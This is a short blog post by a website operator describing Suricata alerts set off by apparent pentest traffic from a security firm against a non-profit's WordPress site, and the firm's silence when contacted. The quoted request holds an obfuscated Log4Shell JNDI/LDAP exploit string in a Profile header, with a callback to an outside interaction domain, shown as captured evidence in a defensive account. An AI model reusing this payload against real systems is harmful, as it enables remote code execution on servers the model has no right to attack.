Back in early July some strange traffic was setting off Suricata alerts. The target was my WordPress website. The website is for the benefit of a non-profit and because of ISP restrictions, is on a custom port. All of the strange traffic came from the same IP, and was registered to a well known cybersecurity firm. It seemed they were pentesting my system. On July 6th I sent them an email. I tried to be nice.
“Good afternoon. I’ve noticed that for the past several days the IP address IP REDACTED has been sending what looks like suspicious traffic to my WordPress website (IP REDACTED, URL REDACTED). An example of this traffic is as follows:
GET / HTTP/1.1
Host: IP REDACTED
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cache-Control: no-cache
Profile: http://${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#cb1gs2nu2ud0j07k0j3gprtaktowifok4.interact.sploit.in}/wap.xml
X-Vendor: VENDOR REDACTED
Accept-Encoding: gzipThis traffic appears to be related to your company. I was wondering if you had any insight into this.”
I received no reply, but the traffic quickly stopped.
The vendor is a pretty aggressive cyber security firm and their penetration testing service was named in the X-Vendor field. There is no doubt where the traffic was coming from.
My guess is that my IP address accidentally got on their test list. When I alerted them, they corrected the error but declined to reply for legal purposes. I understand their caution. Back in 2019 two physical pentesters were arrested in Iowa. It was a pretty messy situation and put a chill through the industry. Any response may be construed as admission of guilt. While I was disappointed by the non-response, I understand it.
Years ago an sftp server I managed received repeated, malicious ssh login attempts from an IP registered to my company’s cloud email provider. I told them, they replied “thanks”, and the traffic stopped. That was before 2019.
But this pentest company screwed up. I want to be clear about that. Somebody didn’t do their due diligence and it put the company at risk of legal action, or at least reputational harm. That is unacceptable and should not have happened. But their mistake doesn’t concern me in the least. A principal reason why I host a website (and other services) is to attract traffic to analyze. And this happens in spades. Also, a standard pentest (or vulnerability scan) does not present a threat to my network. In fact, had I not been monitoring traffic, it would have gone completely unnoticed.
I had no intention of filing a complaint, but I would have been very interested in hearing their side of the story. I’ll eventually see them at a trade show. I won’t be bringing it up.